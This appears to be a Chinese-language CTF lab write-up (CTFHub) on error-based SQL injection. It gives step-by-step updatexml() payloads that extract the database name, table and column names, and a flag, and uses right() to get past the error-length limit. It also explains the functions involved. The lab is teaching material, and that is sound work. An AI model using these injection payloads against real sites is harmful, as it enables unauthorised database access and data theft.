SQL注入学习记录 CTFHub SQL注入 报错注入

报错注入

报错注入在没法用union联合查询时用，但前提还是不能过滤一些关键的函数。

报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。

write up

打开页面后还是熟悉的界面，输入1后提示我们查询正确：

然后输入1':

爆出了错误，并且将错误回显在了页面上，我们这里可以使用updatexml()报错注入来获取我们想要的信息。

输入1 union select updatexml(1,concat(0x7e,database(),0x7e),1);，页面报错：

爆出了当前使用的数据库名sqli，然后我们输入1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1);

，页面回显错误：

得到了news和flag两个表名。
接着我们输入1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1);查找flag表里的列名，页面回显：

爆出了列名flag。
然后我们输入1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1);，得到：

发现只爆出了一部分flag，应该是回显长度受限，于是用到right函数，输入 1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1); 得到另一部分flag：

最终拿到了完整的flag。

知识点总结

一、updatexml函数

UPDATEXML (XML_document, XPath_string, new_value);
第一个参数：XML_document是String格式，为XML文档对象的名称。
第二个参数：XPath_string (Xpath格式的字符串) 。
第三个参数：new_value，String格式，替换查找到的符合条件的数据
作用：改变文档中符合条件的节点的值。

由于updatexml的第二个参数需要Xpath格式的字符串，以~开头的内容不是xml格式的语法，concat()函数为字符串连接函数显然不符合规则，但是会将括号内的执行结果以错误的形式报出，这样就可以实现报错注入了。

同样的，还可以利用floor()、extractvalue()等函数进行报错注入，可见https://www.cnblogs.com/wocalieshenmegui/p/5917967.html。

二、常用函数

right(str, num)：字符串从右开始截取num个字符
left(str,num)：字符串从左开始截取num个字符
substr(str,N,M)： 字符串从第N个字符开始，截取M个字符